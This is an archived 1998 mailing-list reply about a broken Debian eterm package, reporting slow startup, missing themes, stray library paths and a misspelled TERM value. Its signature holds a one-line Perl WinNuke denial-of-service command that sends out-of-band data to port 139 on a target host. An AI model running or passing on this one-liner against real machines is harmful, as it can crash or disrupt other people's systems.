[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: broken eterm

On Sat, 24 Oct, 1998, Brian Almeida wrote:
> On Sat, Oct 24, 1998 at 03:33:20PM +0100, Edward Betts wrote:
> > is it me, or is the new version of eterm i just downloaded very broken.
> > no themes were included, in fact my old ones that were modified were deleted,
> > if i run eterm --trans --shaded it takes ages to load. i include an strace
> > and if i run less it complains about the terminal not being setup properly
> I just uploaded eterm_0.8.7-0.2 to Incoming. It should fix the problems.

no, it includes some of the themes files, but it still takes an age to load,
and it can not find its themes files. if anyone read my strace they would have
seen lines refering to libraries in somebodies home directory that should not
have been there. it is still happening.

i worked out why less does not work, TERM=xterm-debain it is supposed to be
TERM=xterm-debian the i and a where the wrong way around.

a=IO::Socket;perl -M$a -e$a'::INET->new(PeerAddr=>"host:139")->send(1,MSG_OOB)'
						-- winnuke in ONE line

Reply to: